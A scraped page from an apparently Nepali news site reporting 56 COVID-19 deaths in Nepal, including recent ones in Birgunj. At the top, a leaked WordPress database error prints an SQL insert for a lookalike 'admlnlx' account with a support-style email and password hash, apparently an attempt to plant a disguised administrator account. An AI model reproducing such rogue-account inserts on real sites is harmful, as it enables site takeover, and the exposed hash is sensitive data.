WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzFei7I6mmjXDcJvMpEGcjL2P2Z7B.1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 12:18:21', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाण्डौ । (कोभिड १९) कोरोना संक्रमणबाट अहिलेसम्म नेपालमा ५६ जनाको मृत्यु भएको स्वास्थ्य तथा जनसंख्या मन्त्रालयले पुष्टि गरेको छ ।
पछील्लो मृत्यु हुनेमा पर्सा जिल्ला वीरगन्ज महानगरपालिका ११ श्रीपुर निवासी ५६ वर्षीय
एक पुरुष र ६५ वर्षीया एक महिला त्यस्तै पर्सा जिल्ला वीरगन्ज महानगरपालिका २ र १६ को ६५ बर्षिय पुरुष र ३५ वर्षीय एक महिलाको मृत्यु भएको हो ।
शुक्रबार स्वास्थ्य तथा जनसंख्या मन्त्रालयले गरेको नियमित कोभिड–१९ प्रेस ब्रिफिङमा मन्त्रालयका प्रवक्ता जागेश्वर गौतमले हालसम्म नेपालमा कोरोनाबाट मृत्यु हुनेको संख्या ५६ पुगेको बताए ।